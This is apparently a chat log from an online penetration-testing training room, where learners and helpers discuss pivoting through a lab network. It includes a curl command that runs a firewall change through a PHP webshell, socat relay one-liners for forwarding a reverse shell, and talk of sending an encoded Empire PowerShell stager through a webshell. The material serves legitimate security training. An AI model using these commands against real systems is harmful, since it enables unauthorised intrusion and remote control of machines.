Equally, with logic-flow analysis, the AV software is still only working with a set of rules to check malicious behaviour. If the malware acts in a way that is unexpected (e.g. has some random code that does the grand some of nothing inserted into the exploit) then it will likely pass this detection method.
Fixed
also same Task - Fortunately (or unfortunately for us as hackers), this is usually nowhere near enough to bypass static evasion methods. - I think this was supposed to be static detection methods
ok cool, I'll delete my comments
Shows how much my testers read of that
Nah, all good
I'm fine with making mistakes
Fixed that too
I think I read everything and if this is all I remember that's quite a good score
Lemme know if you see any others
Yeah, I'm usually pretty good with that kind of thing. Just occasionally late at night my brain goes dead
yeah no doubt
Hey, I read it. I just self corrected it in my head.
sup3rhero1 is about to start streaming Wreath, for anyone wanting to watch
https://twitch.tv/sup3rhero1
cool!
Hi everyone, I'm at Task 29 C&C Git Server, and I'm trying to get an agent from Git Server through http_hop listener. I set up the http_hop listener, got the .php files and set up a php server in the webserver. (I also gave firewall access to its port if I didn't mess it up.) But when I try executing Empire stager's payload through the webshell in the gitserver (after url-encoding) I get powershell help page as a response. Basic commands such as "powershell whoami" are working fine. What could be the reason for this?
How thorough does the attack narrative in the writeup have to be if I want to submit it? For example do I need to include the pivot syntax?
I would if I were you, although I may not hold you to that.
As a general rule, everything should be exactly reproducible by a security engineer for the organisation you hacked
That's usually when it's interpreting the command badly. What exactly are you doing?
I got to the id_rsa file, it's empty; not nice π
I created a very simple bash pseudoshell script for the webshell on the Git Server in previous tasks, I used it in the previous tasks and it worked fine. In this task, the task guide says create a http hop listener and use it to get an agent from the Git Server. Then it says to create a multi/launcher stager with this http_hop listener as its listener. I did this, and it gave me a payload "powershell (some options here) -enc (base64 encoded script here)". I took this payload to an online url encoder, and url encoded it. Then I fed it to the webshell on the Git Server through the script I mentioned. The script just takes the user input and does "a=$userinput" as a post request to the IP address, just like in the tasks.
Goddamnit. Not again.
Which subnet are you on?
Could you please disconnect from the VPN and DM me the config? I'll fix it manually
ok thanks, but which config?
The .ovpn file you downloaded
is the network working for you guys?
which network
Yes. What's up with it?
That sounds good
Could you try doing it with cURL manually, just to be sure?
oh my bad, was a problem from my end, sry ty
Np
Oh, it worked! Looks like there was something wrong with taking user input as a variable then sending that. Perhaps Bash can't handle input that is too long? Thanks a lot :)
Am I supposed to set up the socat relay on .150 or .200 with my attacking device, or with .150 and .200?
for task 20
We could set up a relay on .200 to forward a shell back to a listener
so does this relay go to my device or .200
also was I supposed to open the firewall on .200 or on .150 using the web shell
I used the web shell
Well, think about it -- where is the shell coming from, and where do you want it to go?
I want it on .200 but I'm not sure where to send it from. My device or the compromised one
I thought the socat was so that I could do it from my device
Kinda
but idk how to get the socat onto there, I transferred it to the compromised device but don't know how to move it to .150
So, you want a shell from .150, and you want to receive it on your attacking machine, yeah?
yeah
Ok. Can .150 connect to your attacking machine directly?
I tried pinging it and it doesn't ping back, so I'm trying to set up the relay
So, can it connect back directly?
no
Ok, so, what's in the middle?
.200, I'm unsure how to get it from there to the target though
Yep, 200
So, use socat (and the firewall) on .200
Then send a shell from .150
Have you watched Dark's video for the task?
I think it might be clearer if you see it working?
so I wasn't supposed to do this to disable the firewall from my attacking device? || curl -X POST http://10.200.72.150/web/exploit-USERNAME.php -d "a=firewall-cmd --zone=public --add-port 17894/tcp" ||
I'll have to find the video, didn't know there was one for this task
that makes sense though for the socat relay
Nah -- firewall-cmd is for administrating redhat servers (including CentOS)
You see the little video icon at the bottom right of the screen?
was missing that icon, I'll check it out. Thank you
rip darks video uses netcat static and not socat haha
I'll try to figure it out for a bit
Oh Goddamnit Dark
I think when I followed the instructions - from my notes you get a reverse shell up before you set up the socat relay/add firewall rules
so you shouldn't need to xpost firewall rule through the php shell
Nah, you need the firewall first in order to get the reverse shell through the relay, but you definitely don't need to administrate the Windows firewall through the PHP webshell
oh right thats where I was getting confused
so would I do something like this from .200 ||./socat-Ferrari404 tcp-l:PORT tcp:10.200.72.150:PORT||
or do I need to specify my tun0 somewhere
Not quite
Havin' some issues with ||WebminRCE||
You would specify the tun0 in the second bit
Should those 2 ports be the one I opened the firewall on?
So more like this:
||./socat-Ferrari404 tcp-l:PORT tcp:TUN0:PORT||
The first Port should be the one you opened on the firewall
The other one doesn't matter, as long as it matches up with what your listener is using on your localhost
Kris, if you are doing this on a steam controller, I am not helping
lol
you know you love it
